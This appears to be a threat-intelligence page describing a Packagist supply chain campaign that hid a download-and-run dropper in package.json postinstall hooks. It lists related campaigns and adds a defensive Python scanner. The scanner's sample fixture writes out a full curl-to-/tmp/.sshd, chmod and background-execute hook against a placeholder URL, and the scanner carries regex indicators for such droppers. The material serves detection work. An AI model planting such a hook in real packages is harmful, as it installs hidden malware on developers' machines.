
Packagist package.json hook supply chain attack campaign

Campaign · Happening score: 39 · 1 unique source, 1 article

Summary


A coordinated supply chain attack campaign compromised eight Packagist packages. Because the payload runs from an install-time hook, every project that installs an affected version re-executes it on each install. The malicious code hid in package.json lifecycle hooks rather than in composer.json metadata, so a review that only looks at the PHP side of a package could miss it. The postinstall hook fetched a Linux binary from GitHub Releases, saved it as /tmp/.sshd, marked it executable, and ran it in the background.

Related Happenings

TrapDoor trap-core.js credential-stealing package malware

Malware Activity
First: 25.05.2026 08:59 · Last: 25.05.2026 08:59 · Sources: 1

About this happening: The **TrapDoor** package malware is spreading across **npm, PyPI, and Crates.io**, putting **developer secrets, cloud credentials, SSH keys, and crypto wallets** at risk. The malw...

TrapDoor cross-ecosystem supply-chain campaign

Campaign
First: 25.05.2026 08:59 · Last: 25.05.2026 08:59 · Sources: 1

About this happening: The **TrapDoor** supply-chain campaign has expanded across **npm, PyPI, and Crates.io**, using **34+ malicious packages** to steal developer secrets and credentials. The operation...

Laravel Lang credential-stealer dropper delivered through malicious Composer packages

Malware Activity
First: 23.05.2026 23:48 · Last: 23.05.2026 23:48 · Sources: 1

About this happening: A **malicious Composer payload** in **Laravel Lang** packages now threatens **Linux, macOS, and Windows** developers with credential theft. The injected `src/helpers.php` dropper...

Laravel Lang organization hit by network compromise

Incident
First: 23.05.2026 23:48 · Last: 23.05.2026 23:48 · Sources: 1

About this happening: The **Laravel Lang organization** suffered a **repository compromise** that let attackers rewrite **GitHub tags** and ship malicious code through **Composer** installs. The affect...

Shai-Hulud worm clone activity on NPM

Malware Activity
First: 18.05.2026 12:45 · Last: 18.05.2026 12:45 · Sources: 1

About this happening: The **Shai-Hulud** malware activity has continued to evolve across the **npm supply chain** and related developer ecosystems. It first infected **npm packages** in **September 202...

Timeline

  1. 23.05.2026 19:07 · 2 articles

    Packagist supply chain campaign disclosed

    Initial Disclosure

    A coordinated supply chain campaign targeted eight Packagist packages by placing malicious code in package.json lifecycle hooks instead of composer.json. A postinstall script downloaded a Linux binary from a GitHub Releases URL, saved it as /tmp/.sshd, marked it executable, and ran it in the background. The affected packages were later removed from Packagist. References to the same payload were also found across 777 GitHub files and in at least two GitHub Actions workflows, indicating that the malicious installer was reused beyond the eight packages.

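The behaviour described in the Summary and in the timeline entry above (a lifecycle hook in package.json that downloads a binary, drops it as /tmp/.sshd, marks it executable and backgrounds it) is something a CI step can check for before any hook is allowed to run. The scanner below is an added example written for this page, not code from the campaign report, from Packagist or from Composer. It walks a directory tree, parses every package.json it finds, and flags install-time hooks whose command combines a remote fetch with a /tmp dot-file, a chmod or a detached execution; it looks at package.json rather than composer.json because npm, yarn and pnpm run a dependency's preinstall/install/postinstall/prepare scripts by default, whereas Composer only executes scripts declared in the root composer.json. The vendor tree it scans, the package names acme/clean-lib and acme/tainted-lib, and the GitHub URL in the sample hook are constructed for the example and are not the packages or the download URL from the campaign.

```python
import json
import re
import tempfile
from pathlib import Path

# Hooks that npm, yarn and pnpm execute automatically while installing a dependency.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

# Indicators modelled on the dropper shape reported on this page: fetch a binary,
# hide it as a dot-file under /tmp, make it executable, run it detached.
INDICATORS = [
    ("remote_fetch", re.compile(r"\b(curl|wget)\b|/releases/download/")),
    ("tmp_dotfile", re.compile(r"/tmp/\.\w+")),
    ("chmod_exec", re.compile(r"\bchmod\s+(\S*\+x|[0-7]{3,4})\b")),
    # a lone '&' (not '&&') followed by ';' or end of command, or nohup/setsid/disown
    ("background_exec", re.compile(r"(?<!&)&(?!&)\s*(?:;|$)|\b(nohup|setsid|disown)\b")),
]


def inspect_package_json(path):
    """Return (hook, indicator, command) findings for one package.json."""
    try:
        data = json.loads(Path(path).read_text(encoding="utf-8"))
    except (json.JSONDecodeError, UnicodeDecodeError):
        return []  # unparsable file: npm would not run anything from it either
    scripts = data.get("scripts") if isinstance(data, dict) else None
    if not isinstance(scripts, dict):
        return []
    findings = []
    for hook, command in scripts.items():
        if hook not in LIFECYCLE_HOOKS or not isinstance(command, str):
            continue
        for name, pattern in INDICATORS:
            if pattern.search(command):
                findings.append((hook, name, command))
    return findings


def risk_level(findings):
    """'high' when a remote fetch is paired with execution or a /tmp drop in the
    same package's hooks; 'review' for any lone indicator; 'none' otherwise."""
    names = {name for _, name, _ in findings}
    if "remote_fetch" in names and names & {"chmod_exec", "background_exec", "tmp_dotfile"}:
        return "high"
    return "review" if names else "none"


def scan_tree(root):
    """Inspect every package.json below root (e.g. vendor/ after composer install),
    regardless of what the neighbouring composer.json declares. Returns
    {relative path: (risk, findings)} for files with at least one finding."""
    root = Path(root)
    results = {}
    for pkg_json in sorted(root.rglob("package.json")):
        findings = inspect_package_json(pkg_json)
        if findings:
            results[pkg_json.relative_to(root).as_posix()] = (risk_level(findings), findings)
    return results


def build_sample_vendor():
    """Constructed sample tree for the example (not the campaign's packages):
    one package with a harmless postinstall, one whose composer.json is clean
    but whose package.json carries a dropper-style postinstall hook."""
    root = Path(tempfile.mkdtemp(prefix="vendor_"))
    clean = root / "acme" / "clean-lib"
    clean.mkdir(parents=True)
    (clean / "composer.json").write_text(json.dumps({"name": "acme/clean-lib"}))
    (clean / "package.json").write_text(json.dumps({
        "name": "clean-lib",
        "scripts": {"build": "vite build", "postinstall": "node scripts/copy-assets.js"},
    }))
    tainted = root / "acme" / "tainted-lib"
    tainted.mkdir(parents=True)
    (tainted / "composer.json").write_text(json.dumps({"name": "acme/tainted-lib"}))
    (tainted / "package.json").write_text(json.dumps({
        "name": "tainted-lib",
        "scripts": {
            # hypothetical URL, shaped like a GitHub Releases download link
            "postinstall": "curl -fsSL https://github.com/example-org/example-repo/releases/download/v1.0/agent"
                           " -o /tmp/.sshd && chmod +x /tmp/.sshd && /tmp/.sshd &",
        },
    }))
    return root


if __name__ == "__main__":
    for rel, (risk, findings) in scan_tree(build_sample_vendor()).items():
        print(f"{risk.upper():7} {rel}")
        for hook, name, command in findings:
            print(f"        {hook}: {name} in {command!r}")
```

Run it against a vendor/ or node_modules/ checkout before the install step that would execute hooks. A `high` result means fetch-and-execute in one package's hooks and should fail the build; `review` flags a hook that trips a single indicator (a legitimate postinstall that runs chmod on its own bundled binary, for instance) for a human look rather than an automatic block.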